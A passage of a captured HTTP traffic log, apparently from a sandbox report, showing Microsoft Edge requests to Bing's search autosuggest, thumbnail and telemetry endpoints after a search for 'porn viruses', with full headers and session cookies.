sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:43 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bc777b5c.1728144343.1d6fee71
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=viruse&cp=6&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=viruse&cp=6&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Content-Length: 780
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163d842914064b4c4b4e461fa3d62
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-y4jUlkk2UffYGefedjIl5R/UwIm0wDAt65Rgt9qAwR4='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:44 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bc777b5c.1728144344.1d6ffd65
GET

https://www.bing.com/th?id=OSK.608473fae4f44a9b3ff11d98cebf98f2&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /th?id=OSK.608473fae4f44a9b3ff11d98cebf98f2&w=175&h=120&qlt=120&c=6&rs=1&cdv=1&pid=RS HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Cache-Control: public, max-age=2592000
Content-Type: image/jpeg
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Timing-Allow-Origin: *
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 9168
Date: Sat, 05 Oct 2024 16:05:44 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bc777b5c.1728144344.1d700415
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=viruses%20&cp=8&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /AS/Suggestions?pt=page.serp&bq=porn+viruses&mkt=nl-nl&qry=viruses%20&cp=8&csr=1&msbqf=false&pths=1&cvid=0DD30F05AB304142B388EAD39E0E9879 HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
X-Autosuggest-ContentWidth: 650
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Content-Length: 463
Content-Type: application/json; charset=utf-8
Cache-Control: private, max-age=300
Content-Encoding: gzip
Vary: Accept-Encoding
X-EventID: 670163d984a247268915bb9802367129
X-AS-SetSessionMarket: nl-nl
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
Content-Security-Policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-zq0Ni4HT3rvmQG/bDv/1CyS7hKu9Kob+rOqn3a9yGfs='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Date: Sat, 05 Oct 2024 16:05:45 GMT
Connection: keep-alive
Set-Cookie: _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; domain=.bing.com; path=/; HttpOnly
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bc777b5c.1728144345.1d70050f
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/lsp.aspx HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 2399
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 204 No Content

Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:46 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bc777b5c.1728144345.1d700d6a
GET

https://www.bing.com/fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aviruses%20%2Ci%3A20%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144344588%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20%2Ci%3A19%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144344604%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20%2Ci%3A19%22%2C%22AsResponseLength%22%3A%22463%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144344767%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20%2Ci%3A19%2Cig%3ACD15D5F022594609BCF8C4B2846709BA%22%2C%22AnswerInfo%22%3A%22MT%3B15%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144344767%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.189:443

Request

GET /fd/ls/l?IG=0DD30F05AB304142B388EAD39E0E9879&CID=05879ADD3EF86D540F588FD23FDB6C78&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Aviruses%20%2Ci%3A20%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1728144344588%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20%2Ci%3A19%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1728144344604%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20%2Ci%3A19%22%2C%22AsResponseLength%22%3A%22463%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1728144344767%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Aviruses%20%2Ci%3A19%2Cig%3ACD15D5F022594609BCF8C4B2846709BA%22%2C%22AnswerInfo%22%3A%22MT%3B15%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1728144344767%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/1.1
Host: www.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; MUIDB=05879ADD3EF86D540F588FD23FDB6C78; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4

Response

HTTP/1.1 200 OK

Content-Length: 0
Access-Control-Allow-Origin: *
Date: Sat, 05 Oct 2024 16:05:47 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
X-CDN-TraceID: 0.bc777b5c.1728144347.1d70134c
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

92.123.128.189:443

Request

POST /fd/ls/lsp.aspx HTTP/1.1
Host: www.bing.com
Connection: keep-alive
Content-Length: 405
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
Content-Type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/search?q=porn+viruses&cvid=b918b912aea0447dac6c3f982135f63c&aqs=edge..69i57.6285j0j4&FORM=ANAB01&PC=U531
Accept-Encoding: gzip, deflate, br
